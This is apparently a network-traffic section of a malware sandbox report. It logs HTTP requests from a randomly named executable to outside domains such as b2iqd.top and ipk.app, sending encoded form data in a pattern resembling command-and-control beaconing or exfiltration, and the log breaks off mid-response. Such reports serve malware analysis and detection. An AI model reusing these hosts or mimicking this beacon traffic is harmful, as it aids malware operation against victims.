53 30 46 75 49 4b 47 31 5a 75 48 36 4d 68 74 41 59 43 2f 49 6c 6e 70 41 77 77 6a 59 4b 45 4d 7a 75 6b 31 63 34 74 77 6a 2f 41 67 71 51 6e 38 43 68 43 4f 33 57 5a 4b 33 36 77 73 46 4d 75 6d 35 54 49 66 62 32 78 53 46 43 48 43 6c 56 31 33 43 34 34 72 33 71 2b 7a 37 4b 54 68 39 50 4a 58 75 77 37 32 35 79 43 4e 57 32 57 32 51 56 4f 67 6c 6c 39 49 6b 75 57 32 36 76 53 72 35 7a 48 59 64 58 39 5a 63 65 66 50 4c 71 54 44 75 31 76 33 76 75 65 6e 4a 4d 36 33 30 64 30 72 30 78 55 2b 35 67 50 55 42 33 7a 6a 66 6e 59 54 58 6e 58 57 55 47 48 41 77 2f 34 38 6c 52 4b 2f 47 32 44 30 30 46 73 4c 6a 2b 35 52 73 73 78 49 72 68 2f 6b 6d 79 4d 62 66 51 6b 6d 78 64 61 76 67 4b 73 68 41 78 57 6a 43 45 41 7a 5a 66 42 30 4f 71 71 79 74 32 6a 4e 62 63 71 42 34 48 [TRUNCATED] Data Ascii: C4NDALSx=TGEGNAtzvXhjBc0/FmyoWBMQqQOtGOLxOeBjNxUnb+FRtk8YBy17eYVWf7J4846xUfyg4U6iwDqgB0a1S0FuIKG1ZuH6MhtAYC/IlnpAwwjYKEMzuk1c4twj/AgqQn8ChCO3WZK36wsFMum5TIfb2xSFCHClV13C44r3q+z7KTh9PJXuw725yCNW2W2QVOgll9IkuW26vSr5zHYdX9ZcefPLqTDu1v3vuenJM630d0r0xU+5gPUB3zjfnYTXnXWUGHAw/48lRK/G2D00FsLj+5RssxIrh/kmyMbfQkmxdavgKshAxWjCEAzZfB0Oqqyt2jNbcqB4HJkqpJmOfE5EbFVQkY8nYmJOaoYXNpD+B2s2ydp7+XS+J8Eg591hLvJzVJ/wHHYCc757pneAdghOptfLNzIAcJhsVhqGBpOJuUg0XUBS0NVzs/KeujSLGbmqQhuEYpqldpTQNegTDrV/P/cS56hbDwvu+zllxZZ3YWKpmVjL2bjnyOn9kE4qVXx+0ljx40Cnsy7IOEhS+XzKQB7v2X623NLlbrFAKoGQL4YBK3IWTl6hyVg2oG5sSnFFI2+17vhM/x6Dy8QVfx52Xt2hQT42czqxLq4DKvy2npIzwhGOw7RImMd79XT1DerAISe6UoP1pgMf1toC54nYqrzWySnsS2XlMusN54XoCzkybI2qIJb9SfP/AFB76qYfaYeIao4svAyeTF24WfEUnBJRXseCG4tdpIHlOnuQeMfORbTLczycUONG5QLWqcyjfjuPXwSdYxwpZAYFgaznfIAFgbzWZW2UTLwUB0j4B3lqSyrIL4db4lPxZejIWd+xSp0hB+1U1a8HiWWXWE7iLJvsQm5Fk3ek5ZUMaTtteC7ky7lLXYAtukI0+Z1LxECOANU096Hd6xpYJBbeltiAlvRv5vosyPOOkZLvO2rP5IA4H05OsSyxRVEO2iksHx/K74W770MgBN9UylaCbX8PZlQK5ngb/L+8S6ahzqhx9kn [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50002	85.159.66.93	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:22.126149893 CET	485	OUT	GET /k45l/?CR=QnXHBNIHO&C4NDALSx=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNqWwQc39IDQJRjeooDZzyDv7Bh8lrkRR4+ww5Wo2X3lAtFqtU/8= HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:18:23.052772045 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Mon, 04 Nov 2024 03:18:22 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-11-04T03:18:27.9031099Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50003	20.2.208.137	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:30.263202906 CET	732	OUT	POST /g8fb/ HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.b2iqd.top Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.b2iqd.top/g8fb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 63 43 32 35 2b 4b 67 72 77 42 35 6a 49 62 6b 38 62 78 4b 37 63 49 35 34 75 79 53 31 64 53 61 4f 65 66 43 72 73 50 53 4f 4b 31 58 4b 7a 45 6a 76 56 58 74 61 58 4d 70 6d 77 6c 6c 58 47 39 54 64 48 6b 52 73 77 57 33 35 41 32 77 53 76 33 58 66 59 67 2f 44 54 77 59 5a 67 57 71 6c 4f 2f 42 33 4c 2f 6a 4c 30 41 39 31 64 77 48 77 51 76 46 61 33 78 46 5a 78 7a 38 44 2f 51 45 47 42 6c 62 75 57 31 50 76 6b 54 36 2b 49 78 53 50 2b 62 74 71 6e 48 2f 55 6e 58 6c 6d 61 71 4e 6d 7a 72 71 58 4f 67 59 56 51 63 32 69 30 4b 63 72 69 2f 38 69 39 47 67 48 6e 56 2b 73 33 41 61 67 58 68 48 54 50 38 56 71 74 30 69 79 50 Data Ascii: C4NDALSx=VKMcC25+KgrwB5jIbk8bxK7cI54uyS1dSaOefCrsPSOK1XKzEjvVXtaXMpmwllXG9TdHkRswW35A2wSv3XfYg/DTwYZgWqlO/B3L/jL0A91dwHwQvFa3xFZxz8D/QEGBlbuW1PvkT6+IxSP+btqnH/UnXlmaqNmzrqXOgYVQc2i0Kcri/8i9GgHnV+s3AagXhHTP8Vqt0iyP
Nov 4, 2024 04:18:31.238440990 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 04 Nov 2024 03:18:31 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50004	20.2.208.137	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:32.813199043 CET	756	OUT	POST /g8fb/ HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.b2iqd.top Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.b2iqd.top/g8fb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 63 43 32 35 2b 4b 67 72 77 41 5a 7a 49 5a 44 6f 62 33 71 37 62 4e 35 34 75 37 79 31 5a 53 61 43 65 66 44 75 30 50 47 69 4b 30 79 32 7a 46 68 58 56 55 74 61 58 59 35 6d 50 71 46 58 52 39 54 5a 50 6b 51 41 77 57 30 46 41 32 78 43 76 32 67 44 62 76 50 44 52 38 34 5a 31 62 4b 6c 4f 2f 42 33 4c 2f 6a 76 65 41 39 39 64 77 32 41 51 73 6b 61 30 38 6c 5a 79 6a 4d 44 2f 43 30 48 70 6c 62 75 34 31 4c 6d 42 54 2b 4f 49 78 57 66 2b 59 35 32 6d 4e 2f 55 74 5a 46 6d 4c 6a 73 36 38 6c 59 66 44 6b 65 35 4d 49 47 79 44 50 71 32 34 6a 50 69 65 55 77 6e 6c 56 38 30 46 41 36 67 39 6a 48 72 50 75 43 6d 4b 37 57 58 73 53 2f 57 37 62 35 67 6b 59 79 36 38 31 45 76 79 59 70 45 4d 64 67 3d 3d Data Ascii: C4NDALSx=VKMcC25+KgrwAZzIZDob3q7bN54u7y1ZSaCefDu0PGiK0y2zFhXVUtaXY5mPqFXR9TZPkQAwW0FA2xCv2gDbvPDR84Z1bKlO/B3L/jveA99dw2AQska08lZyjMD/C0Hplbu41LmBT+OIxWf+Y52mN/UtZFmLjs68lYfDke5MIGyDPq24jPieUwnlV80FA6g9jHrPuCmK7WXsS/W7b5gkYy681EvyYpEMdg==
Nov 4, 2024 04:18:33.763628960 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 04 Nov 2024 03:18:33 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50005	20.2.208.137	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:35.363837957 CET	1769	OUT	POST /g8fb/ HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.b2iqd.top Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.b2iqd.top/g8fb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 63 43 32 35 2b 4b 67 72 77 41 5a 7a 49 5a 44 6f 62 33 71 37 62 4e 35 34 75 37 79 31 5a 53 61 43 65 66 44 75 30 50 48 32 4b 31 45 43 7a 46 47 44 56 56 74 61 58 62 35 6d 30 71 46 58 51 39 58 31 4c 6b 51 63 4b 57 79 42 41 73 54 61 76 2f 30 33 62 30 2f 44 52 30 59 5a 68 57 71 6c 58 2f 42 48 50 2f 6a 2f 65 41 39 39 64 77 31 6f 51 36 46 61 30 76 56 5a 78 7a 38 44 37 51 45 48 53 6c 64 47 4f 31 4c 71 2f 54 50 79 49 78 33 7a 2b 5a 4d 71 6d 4c 76 55 6a 55 6c 6e 57 6a 73 33 38 6c 63 47 36 6b 61 78 71 49 41 4f 44 50 4f 4b 6b 6e 74 54 48 43 53 6a 43 50 64 41 51 62 71 6f 76 71 48 54 76 74 6a 75 45 31 57 50 56 66 70 72 6b 54 34 35 65 52 6b 65 39 73 44 6e 74 5a 71 41 41 4e 6a 39 66 59 4f 62 79 53 73 54 4c 74 79 7a 33 44 5a 74 59 61 70 56 5a 78 57 56 4b 2b 41 79 34 30 67 4f 58 41 63 61 6e 5a 69 64 56 71 66 44 74 46 31 34 57 36 53 7a 39 30 78 59 64 7a 76 6c 4f 64 71 63 35 55 72 78 57 55 6d 55 39 6f 55 35 2f 42 45 64 70 79 71 6d 69 4a 44 77 69 68 56 6b 70 6a 69 4c 79 70 43 51 38 6d [TRUNCATED] Data Ascii: C4NDALSx=VKMcC25+KgrwAZzIZDob3q7bN54u7y1ZSaCefDu0PH2K1ECzFGDVVtaXb5m0qFXQ9X1LkQcKWyBAsTav/03b0/DR0YZhWqlX/BHP/j/eA99dw1oQ6Fa0vVZxz8D7QEHSldGO1Lq/TPyIx3z+ZMqmLvUjUlnWjs38lcG6kaxqIAODPOKkntTHCSjCPdAQbqovqHTvtjuE1WPVfprkT45eRke9sDntZqAANj9fYObySsTLtyz3DZtYapVZxWVK+Ay40gOXAcanZidVqfDtF14W6Sz90xYdzvlOdqc5UrxWUmU9oU5/BEdpyqmiJDwihVkpjiLypCQ8m51cFN8h6319i3ryEjvRvt99MfLdMFVkzVEf3qmx4iU6GrPsUbOJJax3ped2hJjf+JA0OpluJ6E5Bhjbfh/U6HcXlhfuMZhb3uZpySTcGEPidjWoMOHh5mnxNdUN53eaDMLi8HqkKnM+KXUH9c9pRomVeml4UdCwlqiV9JnLJZQYOim8xFC2oi7KVYdgbwNbbhZoupA2k/XeE7KUPXACHW6KVQVn8DcE6muVsEL6/BRXsvjK4VGk0J+dl18av9U/Zrs91DISZzmYX/oZk1Ja5GyeLUjVJMclwxCX+FQSR0zGBkNWLZe28vKJxYWWQK9xk0zDNyYUL25C9Gf4KrHugAlsMEYcjfxVcprwX3HogUokHaw75tK8BaEP6UpMrDCnxqF8KWBw29t+7Iv4Hjggpm9MUsHGekICjDypxcqUVsw1vOhetNprf+Otu0rfbYVY0fhtYMMt4uP+7ipFNa6EvSvGcHDcusPametp50NGw7CQdVfCGOV8p7NWIj5l7MUv0Qm/3zvHPO2e9t2iBJoCdvfqsLSnxJdi4hMtse9hCzFtLPYTikOgl7QSbGWfcAKttGZqokGVGd6x8v6unMhj+K3htFE9UaiOo1EsDGoR4CZHFk1yolIQFcBy5ikKnoaB8EAY8F+gqQL5/yBtKi4JgKbCk2afrHPjxhc [TRUNCATED]
Nov 4, 2024 04:18:36.432338953 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 04 Nov 2024 03:18:36 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50006	20.2.208.137	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:37.903831005 CET	482	OUT	GET /g8fb/?C4NDALSx=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30Gcstri1K8bQKUwmCuPwlz5Cfst33gL1mGdwQpdqLCFFHTDh8Wu1bM=&CR=QnXHBNIHO HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:18:38.841590881 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 04 Nov 2024 03:18:38 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50007	13.248.169.48	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:44.115850925 CET	726	OUT	POST /phav/ HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.ipk.app Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.ipk.app/phav/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 4e 75 35 6f 6d 67 78 5a 46 62 6e 4d 5a 53 72 32 6f 48 74 4f 6b 57 31 4e 2b 38 2b 47 74 64 65 63 57 75 61 74 46 36 6a 4c 75 64 6b 6f 42 50 2b 31 65 64 6d 42 6a 61 65 30 79 4d 68 46 76 79 36 4f 30 61 6a 51 63 55 58 39 75 52 47 76 6e 62 33 2b 7a 51 6d 53 49 77 6a 4f 78 69 79 47 42 45 56 6b 36 33 6b 6c 4c 6e 39 6c 42 61 78 2b 4c 31 6a 36 30 76 39 65 30 6e 77 38 35 5a 78 63 58 72 50 38 31 4d 34 30 69 57 77 62 78 64 44 73 68 6b 46 61 77 70 73 44 37 4c 79 5a 6f 58 41 54 41 52 56 62 73 6c 59 66 6b 68 42 55 31 37 72 53 65 42 58 43 75 70 4f 6e 75 72 6f 65 65 32 34 34 2b 53 37 6a 77 69 47 66 76 6e 59 2b 30 42 53 42 Data Ascii: C4NDALSx=Nu5omgxZFbnMZSr2oHtOkW1N+8+GtdecWuatF6jLudkoBP+1edmBjae0yMhFvy6O0ajQcUX9uRGvnb3+zQmSIwjOxiyGBEVk63klLn9lBax+L1j60v9e0nw85ZxcXrP81M40iWwbxdDshkFawpsD7LyZoXATARVbslYfkhBU17rSeBXCupOnuroee244+S7jwiGfvnY+0BSB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50008	13.248.169.48	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:46.753673077 CET	750	OUT	POST /phav/ HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.ipk.app Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.ipk.app/phav/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 4e 75 35 6f 6d 67 78 5a 46 62 6e 4d 4c 68 7a 32 6b 47 74 4f 69 32 31 4b 78 63 2b 47 6e 39 65 59 57 75 47 74 46 2f 62 62 75 75 41 6f 50 4e 57 31 64 63 6d 42 6d 61 65 30 6d 38 68 41 6c 53 36 51 30 61 2f 2b 63 56 72 39 75 52 36 76 6e 65 54 2b 30 6e 61 56 4c 41 6a 4d 33 69 79 45 63 30 56 6b 36 33 6b 6c 4c 6e 35 50 42 65 64 2b 4c 41 7a 36 6d 61 52 42 71 58 77 7a 6f 5a 78 63 54 72 50 34 31 4d 34 57 69 58 73 78 78 65 37 73 68 6c 31 61 77 39 34 43 30 4c 79 54 72 6e 42 43 46 30 49 50 69 30 56 77 37 54 74 6e 69 70 66 4f 53 58 4b 59 79 61 4f 45 38 37 49 63 65 30 67 4b 2b 79 37 4a 79 69 2b 66 39 77 55 5a 37 31 33 69 76 39 51 7a 73 6b 39 6d 58 62 6b 5a 41 6c 54 6c 76 48 50 52 73 51 3d 3d Data Ascii: C4NDALSx=Nu5omgxZFbnMLhz2kGtOi21Kxc+Gn9eYWuGtF/bbuuAoPNW1dcmBmae0m8hAlS6Q0a/+cVr9uR6vneT+0naVLAjM3iyEc0Vk63klLn5PBed+LAz6maRBqXwzoZxcTrP41M4WiXsxxe7shl1aw94C0LyTrnBCF0IPi0Vw7TtnipfOSXKYyaOE87Ice0gK+y7Jyi+f9wUZ713iv9Qzsk9mXbkZAlTlvHPRsQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50009	13.248.169.48	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:49.314064980 CET	1763	OUT	POST /phav/ HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.ipk.app Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.ipk.app/phav/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 4e 75 35 6f 6d 67 78 5a 46 62 6e 4d 4c 68 7a 32 6b 47 74 4f 69 32 31 4b 78 63 2b 47 6e 39 65 59 57 75 47 74 46 2f 62 62 75 75 49 6f 50 38 32 31 66 2f 2b 42 6c 61 65 30 36 73 68 42 6c 53 37 56 30 61 6e 36 63 56 6d 43 75 55 32 76 6e 39 72 2b 31 54 4f 56 63 51 6a 4d 31 69 79 48 42 45 55 6d 36 33 30 68 4c 6e 70 50 42 65 64 2b 4c 42 44 36 32 66 39 42 6f 58 77 38 35 5a 78 59 58 72 4f 64 31 4d 77 38 69 58 6f 4c 77 75 62 73 68 46 6c 61 31 4c 45 43 72 37 79 56 75 6e 42 61 46 30 4d 35 69 30 4a 47 37 57 35 65 69 70 37 4f 57 6d 37 44 6e 4f 4f 43 2b 64 49 67 4b 6d 6f 79 35 56 6a 61 71 43 71 35 73 43 52 78 30 57 4c 57 30 59 38 66 71 6c 77 43 63 34 63 45 42 51 54 31 6a 30 2b 48 75 72 2f 36 59 74 79 52 75 31 45 77 56 4d 4c 66 77 55 79 54 69 35 4c 30 7a 39 50 54 33 4c 79 75 76 76 39 42 6f 4e 33 4e 45 47 77 54 58 6e 74 64 5a 39 79 37 6a 70 30 33 67 31 77 48 65 4d 63 78 76 56 4c 42 6c 67 77 6a 32 49 78 49 6f 4d 64 56 52 6e 2b 33 70 6a 65 6c 6f 76 65 6c 57 39 6c 73 30 59 49 6f 37 6d 50 46 59 [TRUNCATED] Data Ascii: C4NDALSx=Nu5omgxZFbnMLhz2kGtOi21Kxc+Gn9eYWuGtF/bbuuIoP821f/+Blae06shBlS7V0an6cVmCuU2vn9r+1TOVcQjM1iyHBEUm630hLnpPBed+LBD62f9BoXw85ZxYXrOd1Mw8iXoLwubshFla1LECr7yVunBaF0M5i0JG7W5eip7OWm7DnOOC+dIgKmoy5VjaqCq5sCRx0WLW0Y8fqlwCc4cEBQT1j0+Hur/6YtyRu1EwVMLfwUyTi5L0z9PT3Lyuvv9BoN3NEGwTXntdZ9y7jp03g1wHeMcxvVLBlgwj2IxIoMdVRn+3pjelovelW9ls0YIo7mPFYycYSk1tg/mTp94HL8e4Roy7+7htJoV6ANrwqNkNVTP5uMx0cvtk6Tc7O7RdKhb0XojPFJhzbWMYZKB8f2WEtDjZ9YZEjQhaDqjZ51D/AyF9ZUWNp54b2e6XiU0nVqKv2TPJKqBaq2tuqjLaRrgALVTtSp5rRq27+XCe+ZtIoOZg3aUkEvfBToQ0mcxmw71gNt454yJEB4AUBBRYECha66640iSC3C/uU+zBju4SY0meJC4xXPPz7HDqqrVRzCTyDjdXNaKqbAb8nnbRoJcLWqE2qEKm3WVM01ssygbz4w9hUCGKP+eE9cZFmPWygcET4GZAVHl6LqlW+AmkVOsTYrNJ3pCEPGZ2uaNjgb+i8aXyTQFn2jBNqGCSmCVoouqixSNHmXluLktfUk3IFCcfa8nROJ3dc8NPmnLWp+XmzpSipXpbHW7WCL2W5BiUev9JTyteasrlmTS+xTFvQhKxO4Rf9nUxxybfBJuWl7T5XVNmzU7uRhuDW7MMjFi/Q0jQKHOXSZKK7rFZc/vD3HpFBGj0CUFdWU7HxjWPzPaShaEgH/jjebgm/YeqqSBQmHza1NqRqMa+NhV7ZRcQNKcFBi4eVHQTC96AFyzVikcW2R+l9GaeU/EorrvZy7Edzn5LKjSust1bzRt5cN/wA2ADLLxm2c1IloLtM80 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50010	13.248.169.48	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:51.863159895 CET	480	OUT	GET /phav/?CR=QnXHBNIHO&C4NDALSx=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ0j57X7xdml97HV8TCJTDchmLx+R+oJJ2lMxnc8gWo/b1dM1vSs= HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:18:52.514153004 CET	413	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 04 Nov 2024 03:18:52 GMT Content-Type: text/html Content-Length: 273 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 43 52 3d 51 6e 58 48 42 4e 49 48 4f 26 43 34 4e 44 41 4c 53 78 3d 41 73 52 49 6c 57 34 6c 46 4b 54 39 4e 67 65 36 6e 57 38 71 35 6b 5a 4a 39 2b 61 41 70 72 61 6f 43 4c 2b 37 45 65 44 55 74 61 46 71 41 64 4b 35 65 65 4b 6d 76 70 62 37 2f 65 6c 36 67 7a 58 62 76 61 37 48 44 31 50 47 79 32 37 45 6d 39 6e 6f 34 7a 76 54 51 30 6a 35 